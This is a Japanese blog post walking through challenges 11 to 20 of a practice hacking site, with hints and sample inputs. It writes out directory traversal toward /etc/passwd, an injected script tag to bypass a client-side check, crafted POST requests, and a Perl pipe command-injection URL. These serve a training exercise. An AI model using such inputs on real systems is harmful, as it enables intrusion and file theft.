読者です 読者をやめる 読者になる 読者になる

道民学生プログラマの憂鬱

やるきになったら書く

8946 解説 11~20

11-20


take11

urlの末尾に?file=index.htmlがあります。
ディレクトリトラバーサルの問題ですね。
../etc/passwdとか試してみましょう。
すると同一フォルダにpasswd.txtがありました

take12

ちょっとわかりにくいですが、urlにsvnとあるので、svnで管理しているのでしょう

/hack/svn/.svn/text-base/index.php.svn-baseにありました。

take13

GIMPとかに投げましょう

take14

if (input_id.value == 8946) {  
    input_id.value = '';//入力されたデータを「空」にする処理 m(_ _)m  
    alert("残念!");  
}  

とあるので、Firebugとかで、空にする処理を消しましょう。

または、

"><script>function  fnFormSubmit(){form1.submit();}</script> 

を送信して
8946を送信するという方法でもいけます。(これが正規法っぽい)

take15

ソースでは take15_answer.php を開いているので、見てみましょう。

curl http://www.hackerschool.jp/hack/take15_answer.php

で見れます。

take16

2進数なので、変換しましょう。

take17

<!--見つかった・・-->

バイナリを変換 → 変換した値.html

<!--見つかった・・その2-->

にこたえがあります。

take18

手作業で頑張ってくださいww

take19

idとid2はurlから渡しましょう。
http://・・・.php?id=1&id2=99
passはrot13します。 で、あとはFirefoxのコンソールからポストしてあげましょう

$.post("http://www.hackerschool.jp/hack/take19.php?id=1&id2=99", {input_id:"abcd", ymd:"年/月/日", pass:"juvgrunpxrem"}, function(data){window.open().document.write(data);});

または、htmlファイルを作り、中身を

    <html>
    <body>
    <form action="http://www.hackerschool.jp/hack/take19.php?id=1&id2=99" method="post">
    <input type="text" value="abcd" name="input_id">
    <input type="text" value="2016/10/01" name="ymd">
    <input type="text" value="juvgrunpxrem" name="pass">
    <input type="submit" value="go">
    </form>
    </body>
    </html>

としてもできる。(試してない。クリア画面に書いてあった)

take20

?file=main.txtとあります。main.txtを開いているようです。

で、よく見るとファイル名が index.pl になっています。
Perlを使用しているようです。
OSコマンドを注入できそうです。

(なぜか、それはperlでファイルを読み書きするときに使う open関数は パイプ付き文字列をOSコマンドとして実行するからだ。)

しかし、本当に実行できたら簡単にバックドアとか設置できてしまいますので、実行できるコマンドは限られているようです。
http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt | ls
とすると......ありますね、なので
file=password.inc
してみます。

ニャー。
もうお分かりでしょう。





























#

わからなかった人のために。


ニャー。何の動物でしょう。

それは英語で何というでしょう。


linuxのコマンドにそのようなコマンドがないか調べてみましょう。

https://www.google.co.jp/#q=Linux+command+cat

次 -> shaige1120.hatenablog.com

前 -> shaige1120.hatenablog.com